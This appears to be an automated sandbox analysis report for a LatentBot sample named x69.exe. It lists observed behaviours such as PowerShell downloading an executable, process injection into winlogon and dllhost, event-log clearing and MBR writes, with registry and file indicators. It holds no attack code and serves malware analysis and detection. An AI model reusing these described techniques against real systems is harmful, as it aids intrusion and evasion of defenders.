Analysis Overview
SHA256
8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6
Threat Level: Known bad
The file x69.exe was found to be: Known bad.
Malicious Activity Summary
Latentbot family
LatentBot
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Downloads MZ/PE file
Blocklisted process makes network request
Checks BIOS information in registry
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Indicator Removal: Clear Windows Event Logs
Enumerates connected drives
Writes to the Master Boot Record (MBR)
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies registry class
Checks processor information in registry
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-19 20:25
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-19 20:25
Reported
2025-05-19 20:26
Platform
win10v2004-20250502-en
Max time kernel
33s
Max time network
38s
Command Line
Signatures
LatentBot
Latentbot family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3160 created 616 | N/A | C:\Users\Admin\AppData\Local\Temp\MasonR.bat | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\MasonKit.com | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MasonKit.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MasonR.bat | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\B: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\svchost.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PHYSICALDRIVE0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3160 set thread context of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\MasonR.bat | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000001209cc65e575574a97b97adb9dbab26a00000000020000000000106600000001000020000000f25a82842c4c4babdc3fefe8cccbac768e9883e01c99573f2bb9de5fb8aa45a3000000000e80000000020000200000006862a7591edf0b7814bb674242142e0853cbfabb6810c4f3f7d9384f57477e4b10060000c5f27dbc758d14b3ffa9d7e07b36bf9f11fd8b8d15d7480bbd0b89b422206364d369c78d872384681ddfe18d3a5c6a5504a07fe0a0c0ebb2508424b9dd880910f8edd057eb6f1de383dd60cb1cba03e0ae3fce86c0bbf48dbbca1d605a48ec1fede9333eb958530be467147cce3d443cd6ee9a91eb088ee01e0cf2e77f1ed120486caba750707ef8a41bc9a9c7063281298397d582b72dbd5ce0e3612508e7c089d9721e214c02a2ddace1e21642a7dabee1834e10d2d72ba696e0d7b8d3be4f5eded7fd8842edd640a3f5f9c3484367531f6a7348c5a2198024aac8a308d79380e649ed5ee7ed3b21d379c7398fabbf08f8658b068a77c94f27a9d1b0febb7037f406878490db9c6ddfcc085bf5627e88ecfb856a80d12ebfb749a9da7ba37cdff1b13adc3c75134b90cc2c44eb664f3ce89ba2edb18d6da347212178ba986d5335ae1603c3ae1defb6c7246214b92bc6038e8c18591d6893f09bf602210e73039631cacaa086350473395f053a47248d8b44da3cd83d112ae3ce0373ca26672e20766a879d4b0c7fd4b2f8f47ab88374f5c36d8e6b02a9c324b1141af8a74fd754e885b10e2fb463f8eb67686900a7d4cfa36efa1ee65165531d80c896c6fc58e18d886f2a8b13cde320521fcad115d67a8fe0c5fcddd1e4d4c697d1c80630b90003f90abc63dccca792cdb622e1c0ab8dd9888ad874f74b3172f0736210d70346ba939de016c5ddff3e84a093e51f5b0e02697f7b2126e7ce682a9ed05f265ab2ce7e3110d5e3911fdf51550a18e9cebde3a4dad93ce58bb7c87f02db9cd2e3fb58486395dcd5bc9fd5acfc8b689db5f5a57587507638e346a42a730214649f72249935008f9d86374743185735a2f2e0c8440e030bd32b5bd6b17780fbc4c4d7455fc32b6d84a9982cf077e7b6ad5ae68d5878c8b6a40d42a5ba35241322cb99a72bb2471807c90a998ff800b03e45009b998c2ef4e0eeb6d7140561cd02cd0aa8d4f02f227c798ad8978a64731ee1504413fcbc71ca7e2bb62578af5f48671d22b507722fb31eb6b284b7e13c037c30ecf6e0fbebfd8d0043ef900b5dc42c4b52728b4587890eb84fb908b440e960a48a09bc3ab8d0dc58b24d718be7114862f4e16c5cc3f48323d830c79c78e6d05d89347c2c9dc0e89ac5b849d2dbc7bc775e2e5be0d3ce5a704e5e6d9be768d45430b12eeafdd6efdadd4903604d883a4f7e7895f9c655a41fee7bacb9ebe360c61f76b3474c8a12ce07295532769446406e74daef972eac03f52efff0d5ae0ee7885c5c16370992098d8fd6bb185feeab6b44f38fa28df6075b9d57bfb66da8540dabec7da9271d343e5ee926bfb6970c8755697bbf98ef84cd295fcdaed27d30acef2dd3d768a1120d357589928040e3ff5b1fd5c9795ff074d19b562f114a654eb7b27c5caf5a4b0a086475993d607a2c45c212b3f7b544a7da349084d4b0ece04db09237d20a47e968b394e06cdbe53de94d579cdeebee34289ea10c433aaca22e3422249e1a59978077283f5de2cb5c5df9887ac0c52685eea42fe572abeaba92a173939e2609e3e20360c36be44bf3f426e251a23ce22ab84ee901d48f90a4e5352378f6e35bc39fc8272a405cfae16dccde64eaae0828a427d8fd642749613ad6e49435e19b1f40e90ed272fad5b0442671cc70fa48fef82e9d9b6259ffbd807e5eced5d08cf7fcd23a472f66901a02754cbc33ff188cdcaabc80041627141adaf3984ce13fd971de2449479cc05de40237231b39b9ec0768cf8d4249ec3ad8e2c4fbf721bfe06680948cfdfd87542d150c12fc70fb9dd4de0182fac05b76d40eee315902981ed41e2322f9a3c69ee3166d2f330c94e8d3b65a31a04445a1952c8a777456bfce41faf9101967496b2e902dc1a763f4633c791673cb0c6052b16c3c180e1fa4eaa99dcfb1e6daf02dffc927841fa3321e76e4024e3a1291a30436d621eb2fe3dd50f3422f611bcdb2ef903a9d1d0733a2fdd906546ae50b8834f96250732185a33da751e3622ad0fa8ca847bc8135f2246796734b32630ee3c148a390d5b57a9df3b29d40bd8080f7ab4934c2b82a8d6b681d4b14d32f8718520ab6c70aa56b29d025e8ad93424594771696512aea502863672247223dc8f7802ae75af114e9e846cde301a98d578a673551628d0141efc4ee3731ee40000000419ba2f93af25bba319798b4770e3ae5e965e0b7e72114c4c86b5fcf9a5016cbf11e5836d8d4a213062b2db32c780a115e73ea22a4fd32cb84b405be7130a15e | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018801257DB2EFD" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018801257DB2EFD" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018801257DB2EFD = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000001209cc65e575574a97b97adb9dbab26a00000000020000000000106600000001000020000000b3d2a232836f01318aa99879d6407517d5365bbb72cda89a8bb1c02de146493f000000000e8000000002000020000000284afc89753feb744c3c724bba119a24088eb4f7f89cca3e5b58e40b82fd386680000000842672f5c2845e39b330b4950d128f918c5c03f5e64e0560248f9cb64c55ffc21e816bc6f57b844084791ddfd9d03a968952a16b900997592f86d47c80029ebfb2f7b2fbc2b6e4a72be1d99b4980d144698a5cb9f42db6320e870c44e5439be856c8e9701b484dff3926c1c098348d40748cf1d592264231723d48532aa63165400000009b38227beeac9f1e2b921fdda60e2517b9622a05fd161fd9ab4cfe6514a33291456cd68a762c645a2fe7a1974301b197230383244ad25e5c55575ff652a82504 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000068fc193afcc8db014283613afcc8db014283613afcc8db01130300000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35a3da32000633131353235656131656439643064373135396666373064626637663837626434373237313134376463666139323262623634653434623135343637353836380000b20009000400efbeb35a3da3b35a3da32e00000000000000000000000000000000000000000000000000d4a9b500630031003100350032003500650061003100650064003900640030006400370031003500390066006600370030006400620066003700660038003700620064003400370032003700310031003400370064006300660061003900320032006200620036003400650034003400620031003500340036003700350038003600380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008c9cb60b1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63313135323565613165643964306437313539666637306462663766383762643437323731313437646366613932326262363465343462313534363735383638000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062616d7564746b710000000000000000d0afe384b7e060428074769582fbd8402f6160966527f011b64c6674a9969650d0afe384b7e060428074769582fbd8402f6160966527f011b64c6674a9969650d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003300340032003500370036003700360033002d0031003900390038003400360035003500320036002d0033003800370030003200390035003500300031002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002d544667000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
